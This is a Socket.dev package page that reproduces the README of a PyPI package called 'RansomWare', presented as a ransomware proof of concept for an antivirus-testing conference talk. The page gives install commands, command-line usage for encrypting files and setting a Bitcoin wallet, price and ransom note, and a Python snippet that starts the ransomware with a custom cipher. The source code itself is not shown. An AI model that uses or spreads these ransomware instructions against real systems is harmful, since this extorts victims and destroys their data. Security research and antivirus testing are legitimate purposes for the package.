Introducing Socket Firewall: Free, Proactive Protection for Your Software Supply Chain.Learn More
Socket
Book a DemoInstallSign in
Socket
Book a DemoInstallSign in

RansomWare

Package Overview
Dependencies
Maintainers
1
Versions
2
Alerts
File Explorer

Advanced tools

License
Socket logo

Install Socket

Detect and block malicious and high-risk dependencies

Install

RansomWare

This package implements a cross platform RansomWare.

pipPyPI
Version
1.0.0
Maintainers
1

RansomWare Logo

RansomWare

Description

This package implements a cross platform RansomWare.

Don't use this ransomware POC for illegal purposes!

This project is developed to test and demonstrate the behavior of antivirus against unknown malware in the context of a specific cybersecurity conference. This malware is basic, it doesn't try to bypass any antivirus, EPP or EDR protection. It can't be used for red team or pentest as it will get stuck, so don't try or you'll waste your time.

Requirements

This package require:

  • python3
  • python3 Standard Library

Installation

Pip

python3 -m pip install RansomWare

Git

git clone "https://github.com/mauricelambert/RansomWare.git"
cd "RansomWare"
python3 -m pip install .

Wget

wget https://github.com/mauricelambert/RansomWare/archive/refs/heads/main.zip
unzip main.zip
cd RansomWare-main
python3 -m pip install .

cURL

curl -O https://github.com/mauricelambert/RansomWare/archive/refs/heads/main.zip
unzip main.zip
cd RansomWare-main
python3 -m pip install .

Usages

Command line

RansomWare              # Using CLI package executable
python3 -m RansomWare   # Using python module
python3 RansomWare.pyz  # Using python executable
RansomWare.exe          # Using python Windows executable

RansomWare aaa # File encryption using "aaa" as key
RansomWare -t 56 aaa # File encryption using "aaa" as key and sleep 56 secondes between file.
RansomWare -e 64 YWFh # File encryption using "aaa" as key (encoded with base64)
RansomWare -w "3LU8wRu4ZnXP4UM8Yo6kkTiGHM9BubgyiG" aaa # File encryption using "aaa" as key and using the wallet: "3LU8wRu4ZnXP4UM8Yo6kkTiGHM9BubgyiG" for ransomnote
RansomWare -c BitCoin aaa # File encryption using "aaa" as key and using the cryptocurrency: "BitCoin" for ransomnote
RansomWare -p 0.01 aaa # File encryption using "aaa" as key and using "0.01" as price

Python script

from RansomWare import RansomWare

def get_IV(filename: str) -> bytes:
	"""
    This function return my weak custom IV.
    """

	return filename.encode()

def crypt(key: bytes, data:bytes) -> bytes:
	"""
    This function encrypts data with key.
    """

	return bytes([(car + key[i % len(key)]) % 256 for i, car in enumerate(data)])

RansomWare(
    b"aaa",
    url="http://127.0.0.1:8000/",
    wallet="3LU8wRu4ZnXP4UM8Yo6kkTiGHM9BubgyiG",
    crypto="BitCoin",
    price="0.01",
    interval_time=56,
    encrypt=crypt,
    get_iv=get_IV,
).start()

Links

  • Pypi
  • Github
  • Documentation
  • Python executable
  • Python Windows executable
  • Github - Python Windows compiled executable
  • SourceForce - Python Windows compiled executable

Licence

Licensed under the GPL, version 3.

Keywords

RansmWare
CryptoLocker
Malware
CyberAttack

FAQs

Did you know?

Socket

Socket for GitHub automatically highlights issues in each pull request and monitors the health of all your open source dependencies. Discover the contents of your packages and block harmful activity before you install or update your dependencies.

Install

Related posts

131 Spamware Extensions Targeting WhatsApp Flood Chrome Web Store

Research

/

Security News

131 Spamware Extensions Targeting WhatsApp Flood Chrome Web Store

The Socket Threat Research Team uncovered a coordinated campaign that floods the Chrome Web Store with 131 rebranded clones of a WhatsApp Web automation extension to spam Brazilian users.

By Kirill Boychenko  -  Oct 18, 2025